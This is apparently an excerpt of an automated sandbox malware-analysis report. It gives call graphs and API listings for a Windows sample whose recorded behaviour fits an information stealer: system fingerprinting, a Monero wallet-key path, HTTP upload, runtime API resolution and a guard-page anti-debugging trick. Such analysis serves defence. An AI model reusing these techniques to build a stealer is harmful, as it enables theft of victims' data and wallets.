6a1b4f 14983->14984 14985 6aa8a0 lstrcpy 14984->14985 14986 6a1b58 14985->14986 14987 6aa9b0 4 API calls 14986->14987 14988 6a1b76 14987->14988 14989 6aa8a0 lstrcpy 14988->14989 14990 6a1b7f 14989->14990 14991 
6a7500 6 API calls 14990->14991 14992 6a1b96 14991->14992 14993 6aa920 3 API calls 14992->14993 14994 6a1ba9 14993->14994 14995 6aa8a0 lstrcpy 14994->14995 14996 6a1bb2 14995->14996 14997 6aa9b0 4 API calls 14996->14997 14998 6a1bdc 14997->14998 14999 6aa8a0 lstrcpy 14998->14999 15000 6a1be5 14999->15000 15001 6aa9b0 4 API calls 15000->15001 15002 6a1c05 15001->15002 15003 6aa8a0 lstrcpy 15002->15003 15004 6a1c0e 15003->15004 15712 6a7690 GetProcessHeap RtlAllocateHeap 15004->15712 15007 6aa9b0 4 API calls 15008 6a1c2e 15007->15008 15009 6aa8a0 lstrcpy 15008->15009 15010 6a1c37 15009->15010 15011 6aa9b0 4 API calls 15010->15011 15012 6a1c56 15011->15012 15013 6aa8a0 lstrcpy 15012->15013 15014 6a1c5f 15013->15014 15015 6aa9b0 4 API calls 15014->15015 15016 6a1c80 15015->15016 15017 6aa8a0 lstrcpy 15016->15017 15018 6a1c89 15017->15018 15719 6a77c0 GetCurrentProcess IsWow64Process 15018->15719 15021 6aa9b0 4 API calls 15022 6a1ca9 15021->15022 15023 6aa8a0 lstrcpy 15022->15023 15024 6a1cb2 15023->15024 15025 6aa9b0 4 API calls 15024->15025 15026 6a1cd1 15025->15026 15027 6aa8a0 lstrcpy 15026->15027 15028 6a1cda 15027->15028 15029 6aa9b0 4 API calls 15028->15029 15030 6a1cfb 15029->15030 15031 6aa8a0 lstrcpy 15030->15031 15032 6a1d04 15031->15032 15033 6a7850 3 API calls 15032->15033 15034 6a1d14 15033->15034 15035 6aa9b0 4 API calls 15034->15035 15036 6a1d24 15035->15036 15037 6aa8a0 lstrcpy 15036->15037 15038 6a1d2d 15037->15038 15039 6aa9b0 4 API calls 15038->15039 15040 6a1d4c 15039->15040 15041 6aa8a0 lstrcpy 15040->15041 15042 6a1d55 15041->15042 15043 6aa9b0 4 API calls 15042->15043 15044 6a1d75 15043->15044 15045 6aa8a0 lstrcpy 15044->15045 15046 6a1d7e 15045->15046 15047 6a78e0 3 API calls 15046->15047 15048 6a1d8e 15047->15048 15049 6aa9b0 4 API calls 15048->15049 15050 6a1d9e 15049->15050 15051 6aa8a0 lstrcpy 15050->15051 15052 6a1da7 15051->15052 15053 6aa9b0 4 API calls 15052->15053 15054 6a1dc6 15053->15054 15055 6aa8a0 lstrcpy 15054->15055 15056 6a1dcf 
15055->15056 15057 6aa9b0 4 API calls 15056->15057 15058 6a1df0 15057->15058 15059 6aa8a0 lstrcpy 15058->15059 15060 6a1df9 15059->15060 15721 6a7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15060->15721 15063 6aa9b0 4 API calls 15064 6a1e19 15063->15064 15065 6aa8a0 lstrcpy 15064->15065 15066 6a1e22 15065->15066 15067 6aa9b0 4 API calls 15066->15067 15068 6a1e41 15067->15068 15069 6aa8a0 lstrcpy 15068->15069 15070 6a1e4a 15069->15070 15071 6aa9b0 4 API calls 15070->15071 15072 6a1e6b 15071->15072 15073 6aa8a0 lstrcpy 15072->15073 15074 6a1e74 15073->15074 15723 6a7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15074->15723 15077 6aa9b0 4 API calls 15078 6a1e94 15077->15078 15079 6aa8a0 lstrcpy 15078->15079 15080 6a1e9d 15079->15080 15081 6aa9b0 4 API calls 15080->15081 15082 6a1ebc 15081->15082 15083 6aa8a0 lstrcpy 15082->15083 15084 6a1ec5 15083->15084 15085 6aa9b0 4 API calls 15084->15085 15086 6a1ee5 15085->15086 15087 6aa8a0 lstrcpy 15086->15087 15088 6a1eee 15087->15088 15726 6a7b00 GetUserDefaultLocaleName 15088->15726 15091 6aa9b0 4 API calls 15092 6a1f0e 15091->15092 15093 6aa8a0 lstrcpy 15092->15093 15094 6a1f17 15093->15094 15095 6aa9b0 4 API calls 15094->15095 15096 6a1f36 15095->15096 15097 6aa8a0 lstrcpy 15096->15097 15098 6a1f3f 15097->15098 15099 6aa9b0 4 API calls 15098->15099 15100 6a1f60 15099->15100 15101 6aa8a0 lstrcpy 15100->15101 15102 6a1f69 15101->15102 15730 6a7b90 15102->15730 15104 6a1f80 15105 6aa920 3 API calls 15104->15105 15106 6a1f93 15105->15106 15107 6aa8a0 lstrcpy 15106->15107 15108 6a1f9c 15107->15108 15109 6aa9b0 4 API calls 15108->15109 15110 6a1fc6 15109->15110 15111 6aa8a0 lstrcpy 15110->15111 15112 6a1fcf 15111->15112 15113 6aa9b0 4 API calls 15112->15113 15114 6a1fef 15113->15114 15115 6aa8a0 lstrcpy 15114->15115 15116 6a1ff8 15115->15116 15742 6a7d80 GetSystemPowerStatus 15116->15742 15119 6aa9b0 4 API calls 15120 6a2018 15119->15120 15121 6aa8a0 lstrcpy 15120->15121 15122 6a2021 15121->15122 15123 
[Call graph fragment, continued from the preceding section; the node/edge list does not render as text. API calls visible along its paths, grouped by the sub-function they belong to:]
• String assembly helpers 6aa740 / 6aa7a0 / 6aa8a0 (lstrcpy), 6aa920 (3 API calls) and 6aa9b0 (lstrcpy, lstrlen, lstrcpy, lstrcat), interleaved between every step below
• GetCurrentProcessId, then 6a9470: OpenProcess, GetModuleFileNameExA, CloseHandle
• 6a7e00, 6a76c6 and 6a7720: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
• 6a7f60: GetLogicalProcessorInformationEx, GetLastError, wsprintfA; 6a7ed0: GetSystemInfo, wsprintfA; 6a8100: GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx, wsprintfA; 6a87c0: GetProcessHeap, RtlAllocateHeap, wsprintfA
• 6a7bcc: GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList, GetLocaleInfoA loop, LocalFree; 6a8d20: LocalAlloc, CharToOemW; 6a7a9a: wsprintfA; 6a8b60: GetSystemTime
• 6a8320: RegOpenKeyExA, then a RegEnumKeyExA loop with wsprintfA, RegOpenKeyExA, RegQueryValueExA, lstrlen, RegQueryValueExA, RegCloseKey
• 6a8680: CreateToolhelp32Snapshot, Process32First, Process32Next loop, CloseHandle
• 6a0759 and its callees: StrCmpCA chain at 6a0799, 6a0865 and 6a099c selecting between string-building branches
• 694838: lstrlen, InternetCrackUrlA; 699af9: LocalAlloc, CryptStringToBinaryA, LocalFree; 6a8ea0: CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA
• 695100 (reached from 6a5190): InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetCloseHandle; 695009: InternetOpenUrlA, InternetReadFile loop, InternetCloseHandle, InternetCloseHandle
• 696d40 via 696530 and 6969b0: VirtualAlloc, VirtualAlloc, LoadLibraryA, GetProcAddress loop, then VirtualFree and FreeLibrary; 6a8a10 / 6a89f0: GetProcessHeap with RtlAllocateHeap / HeapFree

                        Control-flow Graph

                        Control-flow summary for 6a9860 (the rendered graph is not reproducible as text): block 6a9860-6a9874 calls 6a9750 and branches; the conditional block 6a987a-6a9a8e calls 6a9780 and then GetProcAddress 21 times against the same module base 75900000; block 6a9a93-6a9af2 calls LoadLibraryA 5 times; the remaining blocks up to 6a9bc2 each guard one or two further GetProcAddress calls (7 in total) against five different module bases (75070000, 75FD0000, 75A50000, 74E50000, 76E80000), one per LoadLibraryA, the last of them resolving NtQueryInformationProcess by name. In total 28 GetProcAddress lookups and 5 LoadLibraryA loads happen at run time in this one function, so the static import table says little about what the sample actually calls.
                        APIs
                        • GetProcAddress.KERNEL32(75900000,01260C18), ref: 006A98A1
                        • GetProcAddress.KERNEL32(75900000,01260EB8), ref: 006A98BA
                        • GetProcAddress.KERNEL32(75900000,01260ED0), ref: 006A98D2
                        • GetProcAddress.KERNEL32(75900000,01260C30), ref: 006A98EA
                        • GetProcAddress.KERNEL32(75900000,01260C48), ref: 006A9903
                        • GetProcAddress.KERNEL32(75900000,01268F70), ref: 006A991B
                        • GetProcAddress.KERNEL32(75900000,01255480), ref: 006A9933
                        • GetProcAddress.KERNEL32(75900000,012553C0), ref: 006A994C
                        • GetProcAddress.KERNEL32(75900000,01260D80), ref: 006A9964
                        • GetProcAddress.KERNEL32(75900000,01260C60), ref: 006A997C
                        • GetProcAddress.KERNEL32(75900000,01260CA8), ref: 006A9995
                        • GetProcAddress.KERNEL32(75900000,01260D98), ref: 006A99AD
                        • GetProcAddress.KERNEL32(75900000,01255400), ref: 006A99C5
                        • GetProcAddress.KERNEL32(75900000,01260CC0), ref: 006A99DE
                        • GetProcAddress.KERNEL32(75900000,01260CD8), ref: 006A99F6
                        • GetProcAddress.KERNEL32(75900000,012554C0), ref: 006A9A0E
                        • GetProcAddress.KERNEL32(75900000,01260CF0), ref: 006A9A27
                        • GetProcAddress.KERNEL32(75900000,01260F90), ref: 006A9A3F
                        • GetProcAddress.KERNEL32(75900000,01255420), ref: 006A9A57
                        • GetProcAddress.KERNEL32(75900000,01260FA8), ref: 006A9A70
                        • GetProcAddress.KERNEL32(75900000,012554E0), ref: 006A9A88
                        • LoadLibraryA.KERNEL32(01260EE8,?,006A6A00), ref: 006A9A9A
                        • LoadLibraryA.KERNEL32(01260F00,?,006A6A00), ref: 006A9AAB
                        • LoadLibraryA.KERNEL32(01260F18,?,006A6A00), ref: 006A9ABD
                        • LoadLibraryA.KERNEL32(01260F30,?,006A6A00), ref: 006A9ACF
                        • LoadLibraryA.KERNEL32(01260F48,?,006A6A00), ref: 006A9AE0
                        • GetProcAddress.KERNEL32(75070000,01260F60), ref: 006A9B02
                        • GetProcAddress.KERNEL32(75FD0000,01260F78), ref: 006A9B23
                        • GetProcAddress.KERNEL32(75FD0000,01269528), ref: 006A9B3B
                        • GetProcAddress.KERNEL32(75A50000,01269540), ref: 006A9B5D
                        • GetProcAddress.KERNEL32(74E50000,01255500), ref: 006A9B7E
                        • GetProcAddress.KERNEL32(76E80000,01268F80), ref: 006A9B9F
                        • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 006A9BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 006A9BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 8f22a602f135059826f9d293958458230c9651aaf97789bf704b012c12253815
                        • Instruction ID: 1bd45dde8bb29b977586d0184707eef98793eb8730a4ec1a61e87fa801f861ab
                        • Opcode Fuzzy Hash: 8f22a602f135059826f9d293958458230c9651aaf97789bf704b012c12253815
                        • Instruction Fuzzy Hash: D9A17CB56022419FD34CEFA8FD8896637F9F74C301734472BAA45C3264DB399941DB26

                        Control-flow Graph

                        Control-flow summary for 6945c0: block 6945c0-694695 calls RtlAllocateHeap, falls into a loop over 6946a0-6946a6 / 6946ac-69474a, and exits through 69474f-6947a9, which calls VirtualProtect with dwSize 4 and flNewProtect 0x100 as listed under APIs. 0x100 is PAGE_GUARD, not an executable protection (PAGE_EXECUTE_READWRITE would be 0x40): the function turns a 4-byte region into a guard page, so the next access to it raises STATUS_GUARD_PAGE_VIOLATION, an exception a debugger or emulator handles differently from the native process.
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0069460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0069479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (one string, referenced 30 times in six runs of five at an 11-byte stride), xrefs: 006945C7, 006945D2, 006945DD, 006945E8, 006945F3, 00694617, 00694622, 0069462D, 00694638, 00694643, 00694657, 00694662, 0069466D, 00694678, 00694683, 006946AC, 006946B7, 006946C2, 006946CD, 006946D8, 00694713, 0069471E, 00694729, 00694734, 0069473F, 0069474F, 0069475A, 00694765, 00694770, 0069477B
                        Memory Dump Source
                        • Same source dump and associated dumps as listed for 6a9860 above (00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true)
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, $-joined, in the original field)
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 3bea84680bd9d18ff54bd1c36ce7b5993eeae270834b28e3065fe50196952860
                        • Instruction ID: a4f3f6c0d55dc835d0ce48a5947e0288ae36bd600658eb1a1cf32d4e85ad3dfd
                        • Opcode Fuzzy Hash: 3bea84680bd9d18ff54bd1c36ce7b5993eeae270834b28e3065fe50196952860
                        • Instruction Fuzzy Hash: B041E8A07C5E89EECE25B7A4A85EFDD7B976FCA700F515044E80B52282CFF16580472B

                        Control-flow Graph (rendered graph not reproduced; basic blocks and their calls, taken from the graph data)
                        • 694880-694942: call 6aa7a0, call 6947b0, call 6aa740 ×5, InternetOpenA, StrCmpCA; via 694944 / 69494b-69494f the function branches either to 694955 or straight to the cleanup at 694ecb
                        • 694955-694acd: call 6a8b60, then repeated 6aa920 / 6aa8a0 / 6aa800 / 6aa9b0, then InternetConnectA; the other branch goes to 694ecb
                        • 694ad3-694ae5: short branch into 694aef-694b22: HttpOpenRequestA; the other branch goes to 694ebe-694ec5: InternetCloseHandle
                        • 694b28-694e28: repeated 6aa9b0 / 6aa8a0 / 6aa800 / 6aa920, call 6aa740, call 6aaad0 ×4, lstrlen ×2, HttpSendRequestA
                        • 694e32-694e5c: InternetReadFile; 694e5e-694e65 loops back through 694e69-694ea7 (6aa9b0, 6aa8a0, 6aa800) until the read loop ends at 694e67-694eb9: InternetCloseHandle, call 6aa800
                        • 694ebe-694ec5: InternetCloseHandle; 694ecb-694ef3: InternetCloseHandle, call 6aaad0, call 699ac0
                        • 694ef5-694f2d: call 6aa820, 6aa9b0, 6aa8a0, 6aa800 (optional); 694f32-694fa2: call 6a8990 ×2, call 6aa7a0, call 6aa800 ×8 (exit)
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
                          • Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00694915
                        • StrCmpCA.SHLWAPI(?,0126FA00), ref: 0069493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00694ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006B0DDB,00000000,?,?,00000000,?,",00000000,?,0126F9E0), ref: 00694DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00694E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00694E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00694E49
                        • InternetCloseHandle.WININET(00000000), ref: 00694EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00694EC5
                        • HttpOpenRequestA.WININET(00000000,0126FA50,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00694B15
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • InternetCloseHandle.WININET(00000000), ref: 00694ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: d681f26ba7cf1b58db97257ae734667970e731251b33b39f094a772c81227995
                        • Instruction ID: 27312c19a6e58bc3d9b7a82d810b968978df1e94c97fbdf52b73f32fecc61a9c
                        • Opcode Fuzzy Hash: d681f26ba7cf1b58db97257ae734667970e731251b33b39f094a772c81227995
                        • Instruction Fuzzy Hash: 7D12EC71911118AADB95FB90DC92FEEB37ABF16300F50419EB10662091EF742F49CF6A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 574eb58f73ca0e942a920a109cf9a1391c107475e5642d7c7b0e28c542da69f9
                        • Instruction ID: 70615cbb819b5257068453752ff466819592e5bb714788ae7a61141832d6e8c0
                        • Opcode Fuzzy Hash: 574eb58f73ca0e942a920a109cf9a1391c107475e5642d7c7b0e28c542da69f9
                        • Instruction Fuzzy Hash: FBF04FB1944208ABC704DF98DD49BAEBBB8FB05711F10026AFA05A2680C77919048BA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 623f1393379af15adc309e0f4262399c80baccfa342e10ff6e9eb13e9ce3dcb4
                        • Instruction ID: 075010d735f2cdeabc50c3e38a19e7de821d49dafbac9e6a2e8e22ed74e1ffc6
                        • Opcode Fuzzy Hash: 623f1393379af15adc309e0f4262399c80baccfa342e10ff6e9eb13e9ce3dcb4
                        • Instruction Fuzzy Hash: 2CD05E7490130CDBCB04DFE0D8496DDBB78FB08312F200695D90562340EA305481CAA6

                        Control-flow Graph (rendered graph not reproduced; basic blocks and their calls, taken from the graph data)
                        • 6a9c10-6a9c1a: entry; branches either into 6a9c20 or directly to 6aa036
                        • 6a9c20-6aa031: GetProcAddress ×43 (all against the same module handle, see the API list below)
                        • 6aa036-6aa0ca: LoadLibraryA ×8
                        • the remaining GetProcAddress groups are each entered or skipped from a short branching block: 6aa0cc-6aa141 ×5 (after 6aa036), 6aa153-6aa211 ×8 (after 6aa146-6aa14d), 6aa21f-6aa293 ×5 (after 6aa216-6aa21d), 6aa2a5-6aa332 ×6 (after 6aa298-6aa29f), 6aa344-6aa41a ×9 (after 6aa337-6aa33e), 6aa428-6aa49d ×5 (after 6aa41f-6aa426), 6aa4ab-6aa4d7 ×2 (after 6aa4a2-6aa4a9), 6aa4e5-6aa510 ×2 (after 6aa4dc-6aa4e3), 6aa522-6aa60d ×10 (after 6aa515-6aa51c), 6aa61b-6aa678 ×4 (after 6aa612-6aa619), 6aa686-6aa699 ×1 (after 6aa67d-6aa684), 6aa6a7-6aa703 ×4 (after 6aa69e-6aa6a5)
                        • 6aa708-6aa709: return
                        APIs
                        • GetProcAddress.KERNEL32(75900000,01255260), ref: 006A9C2D
                        • GetProcAddress.KERNEL32(75900000,012551C0), ref: 006A9C45
                        • GetProcAddress.KERNEL32(75900000,01269630), ref: 006A9C5E
                        • GetProcAddress.KERNEL32(75900000,01269618), ref: 006A9C76
                        • GetProcAddress.KERNEL32(75900000,0126DFB0), ref: 006A9C8E
                        • GetProcAddress.KERNEL32(75900000,0126DEF0), ref: 006A9CA7
                        • GetProcAddress.KERNEL32(75900000,0125BB20), ref: 006A9CBF
                        • GetProcAddress.KERNEL32(75900000,0126E070), ref: 006A9CD7
                        • GetProcAddress.KERNEL32(75900000,0126E028), ref: 006A9CF0
                        • GetProcAddress.KERNEL32(75900000,0126E088), ref: 006A9D08
                        • GetProcAddress.KERNEL32(75900000,0126E0B8), ref: 006A9D20
                        • GetProcAddress.KERNEL32(75900000,012551E0), ref: 006A9D39
                        • GetProcAddress.KERNEL32(75900000,01255220), ref: 006A9D51
                        • GetProcAddress.KERNEL32(75900000,01255300), ref: 006A9D69
                        • GetProcAddress.KERNEL32(75900000,012552A0), ref: 006A9D82
                        • GetProcAddress.KERNEL32(75900000,0126DFF8), ref: 006A9D9A
                        • GetProcAddress.KERNEL32(75900000,0126E040), ref: 006A9DB2
                        • GetProcAddress.KERNEL32(75900000,0125BBC0), ref: 006A9DCB
                        • GetProcAddress.KERNEL32(75900000,01255360), ref: 006A9DE3
                        • GetProcAddress.KERNEL32(75900000,0126E0A0), ref: 006A9DFB
                        • GetProcAddress.KERNEL32(75900000,0126E0D0), ref: 006A9E14
                        • GetProcAddress.KERNEL32(75900000,0126DFC8), ref: 006A9E2C
                        • GetProcAddress.KERNEL32(75900000,0126DE48), ref: 006A9E44
                        • GetProcAddress.KERNEL32(75900000,01255380), ref: 006A9E5D
                        • GetProcAddress.KERNEL32(75900000,0126DF38), ref: 006A9E75
                        • GetProcAddress.KERNEL32(75900000,0126E058), ref: 006A9E8D
                        • GetProcAddress.KERNEL32(75900000,0126DF98), ref: 006A9EA6
                        • GetProcAddress.KERNEL32(75900000,0126DEA8), ref: 006A9EBE
                        • GetProcAddress.KERNEL32(75900000,0126DEC0), ref: 006A9ED6
                        • GetProcAddress.KERNEL32(75900000,0126E0E8), ref: 006A9EEF
                        • GetProcAddress.KERNEL32(75900000,0126E100), ref: 006A9F07
                        • GetProcAddress.KERNEL32(75900000,0126DE60), ref: 006A9F1F
                        • GetProcAddress.KERNEL32(75900000,0126DF68), ref: 006A9F38
                        • GetProcAddress.KERNEL32(75900000,0126B8E8), ref: 006A9F50
                        • GetProcAddress.KERNEL32(75900000,0126DF80), ref: 006A9F68
                        • GetProcAddress.KERNEL32(75900000,0126E118), ref: 006A9F81
                        • GetProcAddress.KERNEL32(75900000,012553A0), ref: 006A9F99
                        • GetProcAddress.KERNEL32(75900000,0126E130), ref: 006A9FB1
                        • GetProcAddress.KERNEL32(75900000,012553E0), ref: 006A9FCA
                        • GetProcAddress.KERNEL32(75900000,0126DE78), ref: 006A9FE2
                        • GetProcAddress.KERNEL32(75900000,0126E010), ref: 006A9FFA
                        • GetProcAddress.KERNEL32(75900000,01255180), ref: 006AA013
                        • GetProcAddress.KERNEL32(75900000,01254DC0), ref: 006AA02B
                        • LoadLibraryA.KERNEL32(0126DE90,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA03D
                        • LoadLibraryA.KERNEL32(0126DFE0,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA04E
                        • LoadLibraryA.KERNEL32(0126DED8,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA060
                        • LoadLibraryA.KERNEL32(0126DF08,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA072
                        • LoadLibraryA.KERNEL32(0126DF20,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA083
                        • LoadLibraryA.KERNEL32(0126DF50,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA095
                        • LoadLibraryA.KERNEL32(0126E1F0,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA0A7
                        • LoadLibraryA.KERNEL32(0126E298,?,006A5CA3,006B0AEB,?,?,?,?,?,?,?,?,?,?,006B0AEA,006B0AE3), ref: 006AA0B8
                        • GetProcAddress.KERNEL32(75FD0000,01255140), ref: 006AA0DA
                        • GetProcAddress.KERNEL32(75FD0000,0126E190), ref: 006AA0F2
                        • GetProcAddress.KERNEL32(75FD0000,01269050), ref: 006AA10A
                        • GetProcAddress.KERNEL32(75FD0000,0126E250), ref: 006AA123
                        • GetProcAddress.KERNEL32(75FD0000,01254F40), ref: 006AA13B
                        • GetProcAddress.KERNEL32(734B0000,0125BA08), ref: 006AA160
                        • GetProcAddress.KERNEL32(734B0000,01255120), ref: 006AA179
                        • GetProcAddress.KERNEL32(734B0000,0125B828), ref: 006AA191
                        • GetProcAddress.KERNEL32(734B0000,0126E268), ref: 006AA1A9
                        • GetProcAddress.KERNEL32(734B0000,0126E280), ref: 006AA1C2
                        • GetProcAddress.KERNEL32(734B0000,01254F00), ref: 006AA1DA
                        • GetProcAddress.KERNEL32(734B0000,01254EC0), ref: 006AA1F2
                        • GetProcAddress.KERNEL32(734B0000,0126E3A0), ref: 006AA20B
                        • GetProcAddress.KERNEL32(763B0000,01254EA0), ref: 006AA22C
                        • GetProcAddress.KERNEL32(763B0000,012550A0), ref: 006AA244
                        • GetProcAddress.KERNEL32(763B0000,0126E400), ref: 006AA25D
                        • GetProcAddress.KERNEL32(763B0000,0126E2F8), ref: 006AA275
                        • GetProcAddress.KERNEL32(763B0000,01254F60), ref: 006AA28D
                        • GetProcAddress.KERNEL32(750F0000,0125B800), ref: 006AA2B3
                        • GetProcAddress.KERNEL32(750F0000,0125B670), ref: 006AA2CB
                        • GetProcAddress.KERNEL32(750F0000,0126E358), ref: 006AA2E3
                        • GetProcAddress.KERNEL32(750F0000,01254E20), ref: 006AA2FC
                        • GetProcAddress.KERNEL32(750F0000,01255060), ref: 006AA314
                        • GetProcAddress.KERNEL32(750F0000,0125B990), ref: 006AA32C
                        • GetProcAddress.KERNEL32(75A50000,0126E1A8), ref: 006AA352
